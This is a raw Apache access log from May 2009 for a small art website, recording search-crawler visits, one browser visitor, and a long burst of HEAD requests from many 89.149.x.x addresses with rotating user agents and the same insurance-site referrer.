209.202.168.82 - - [30/May/2009:03:28:44 +0100] "GET /feidad.html HTTP/1.0" 200 820 "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" 238 1140
216.129.119.14 - - [30/May/2009:05:35:35 +0100] "GET /webalizer/usage_200704.html HTTP/1.0" 200 104070 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 104395
216.129.119.14 - - [30/May/2009:06:28:43 +0100] "GET /log/error.log HTTP/1.0" 200 157214 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 202 157541
216.129.119.14 - - [30/May/2009:06:30:22 +0100] "GET /log/?C=D;O=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 201 3418
216.129.119.14 - - [30/May/2009:08:40:15 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.71.237 - - [30/May/2009:11:05:48 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.237 - - [30/May/2009:11:05:49 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 143416 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 143779
216.129.119.14 - - [30/May/2009:11:23:19 +0100] "GET /webalizer/usage_200711.html HTTP/1.0" 200 149412 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 149738
66.249.71.237 - - [30/May/2009:12:51:54 +0100] "GET /log/?C=D;O=A HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 243 3456
66.249.71.237 - - [30/May/2009:13:01:04 +0100] "GET /log/web.log.3 HTTP/1.1" 200 1961 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 2321
66.249.71.237 - - [30/May/2009:13:56:08 +0100] "GET /log/error.log HTTP/1.1" 200 157461 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 244 157826
216.129.119.14 - - [30/May/2009:14:06:05 +0100] "GET /webalizer/usage_200506.html HTTP/1.0" 200 86228 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 86552
216.129.119.14 - - [30/May/2009:18:57:07 +0100] "GET /webalizer/usage_200505.html HTTP/1.0" 200 81815 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 82139
141.155.31.53 - - [30/May/2009:19:12:58 +0100] "GET / HTTP/1.1" 200 1266 "http://afonline.artistsspace.org/view_artist.php?aid=4111" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" 441 1625
141.155.31.53 - - [30/May/2009:19:12:58 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "http://www.Decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" 324 641
141.155.31.53 - - [30/May/2009:19:12:59 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.Decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" 328 154123
141.155.31.53 - - [30/May/2009:19:12:59 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.Decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" 322 226047
141.155.31.53 - - [30/May/2009:19:13:02 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.Decodeine.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" 420 1177
141.155.31.53 - - [30/May/2009:19:13:03 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.Decodeine.com/feidad.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" 333 7503734
208.80.195.44 - - [30/May/2009:22:57:21 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {91F3C84D-9E57-43E2-8308-F3881DD09F13}; iebar; SV1; ZangoToolbar 4.8.2)" 179 1587
124.115.0.23 - - [31/May/2009:01:33:52 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
74.62.161.76 - - [31/May/2009:02:11:30 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "baypup/1.1 (Baypup; http://www.baypup.com/; jason@baypup.com)" 461 584
74.62.161.76 - - [31/May/2009:02:11:31 +0100] "GET / HTTP/1.1" 304 - "-" "baypup/1.1 (Baypup; http://www.baypup.com/; jason@baypup.com)" 501 197
216.129.119.14 - - [31/May/2009:08:34:16 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
89.149.234.43 - - [31/May/2009:09:27:46 +0100] "GET /webalizer/usage_200905.html HTTP/1.0" 200 144350 "-" "-" 70 144676
89.149.249.189 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (compatible; Konqueror/3.2; Linux 2.4.27; X11) (KHTML, like Gecko)" 205 302
89.149.249.187 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 173 302
89.149.212.94 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.7.5) Gecko/20041108 Firefox/1.0" 211 302
89.149.212.93 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" 186 302
89.149.234.42 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.249.188 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada Plus 5.6)" 197 302
89.149.249.182 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.249.189 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 177 302
89.149.207.78 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201 302
89.149.207.79 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 196 302
89.149.234.42 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 211 302
89.149.212.94 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 196 302
89.149.212.92 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201 302
89.149.207.79 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; cw-mep2000-retail)" 196 302
89.149.249.187 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 196 302
89.149.212.92 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; DigExt)" 182 302
89.149.249.185 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.7.5) Gecko/20041108 Firefox/1.0" 211 302
89.149.212.93 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" 186 302
89.149.249.186 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; DigExt)" 182 302
89.149.249.187 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; cw-mep2000-retail)" 196 302
89.149.207.79 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)" 215 302
89.149.249.189 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "msnbot/0.3 (+http://search.msn.com/msnbot.htm)" 173 302
89.149.207.78 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.207.79 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201 302
89.149.249.184 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.7) Gecko/20040707 Firefox/0.9.2" 211 302
89.149.207.78 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1" 207 302
89.149.249.183 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 211 302
89.149.249.182 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.212.93 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)" 215 302
89.149.207.79 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 181 302
89.149.249.183 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 210 302
89.149.249.182 - - [31/May/2009:09:27:47 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [pl]" 193 302
89.149.207.78 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "-" 113 302
89.149.234.42 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 177 302
89.149.212.91 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.212.91 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; PL; rv:1.7.2) Gecko/20040803" 196 302
89.149.234.43 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 181 302
89.149.249.186 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201 302
89.149.249.184 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 177 302
89.149.234.42 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Neostrada TP 6.1)" 200 302
89.149.249.188 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)" 192 302
89.149.212.94 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada TP 6.1)" 195 302
89.149.212.92 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 177 302
89.149.249.188 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)" 215 302
89.149.212.91 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 182 302
89.149.212.94 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.234.43 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" 193 302
89.149.249.185 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201 302
89.149.249.182 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "msnbot/0.3 (+http://search.msn.com/msnbot.htm)" 173 302
89.149.249.185 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; cw-mep2000-retail)" 196 302
89.149.207.78 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" 193 302
89.149.249.186 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 181 302
89.149.249.185 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0)" 197 302
89.149.234.42 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 196 302
89.149.234.42 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 177 302
89.149.207.78 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 177 302
89.149.249.186 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada Plus 5.6)" 197 302
89.149.249.188 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 182 302
89.149.207.79 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; cw-mep2000-retail)" 196 302
89.149.212.92 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada TP 6.1)" 195 302
89.149.212.93 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; cw-mep2000-retail)" 196 302
89.149.249.187 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada TP 6.1)" 195 302
89.149.212.91 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0)" 197 302
89.149.207.79 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; DigExt)" 182 302
89.149.249.187 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "-" 113 302
89.149.234.43 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 177 302
89.149.212.94 - - [31/May/2009:09:27:48 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Neostrada Plus 5.6)" 197 302
89.149.249.185 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)" 192 302
89.149.249.189 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)" 215 302
89.149.234.43 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" 193 302
89.149.212.91 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 181 302
89.149.212.94 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 177 302
89.149.212.93 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 196 302
89.149.249.184 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" 206 302
89.149.249.184 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 177 302
89.149.249.183 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 177 302
89.149.207.79 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" 193 302
89.149.234.42 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0)" 197 302
89.149.212.94 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 201 302
89.149.249.187 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Neostrada TP 6.1)" 200 302
89.149.249.186 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "-" 113 302
89.149.249.186 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 181 302
89.149.212.93 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada TP 6.1)" 195 302
89.149.249.189 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" 196 302
89.149.249.185 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" 193 302
89.149.249.187 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "-" 113 302
89.149.249.186 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [pl]" 193 302
89.149.249.182 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.7.5) Gecko/20041108 Firefox/1.0" 211 302
89.149.207.79 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" 186 302
89.149.212.91 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.249.184 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; DigExt)" 182 302
89.149.212.93 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)" 174 302
89.149.249.185 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada TP 6.1)" 195 302
89.149.249.188 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322)" 192 302
89.149.207.79 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; cw-mep2000-retail)" 196 302
89.149.234.42 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]" 193 302
89.149.212.91 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; cw-mep2000-retail)" 196 302
89.149.249.186 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Neostrada Plus 5.6)" 197 302
89.149.249.185 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1" 207 302
89.149.249.182 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.7) Gecko/20040707 Firefox/0.9.2" 211 302
89.149.207.79 - - [31/May/2009:09:27:49 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts)" 193 302
89.149.249.188 - - [31/May/2009:09:27:50 +0100] "HEAD / HTTP/1.1" 200 - "http://autoversicherung.parkhotel-silverio.at" "-" 113 302
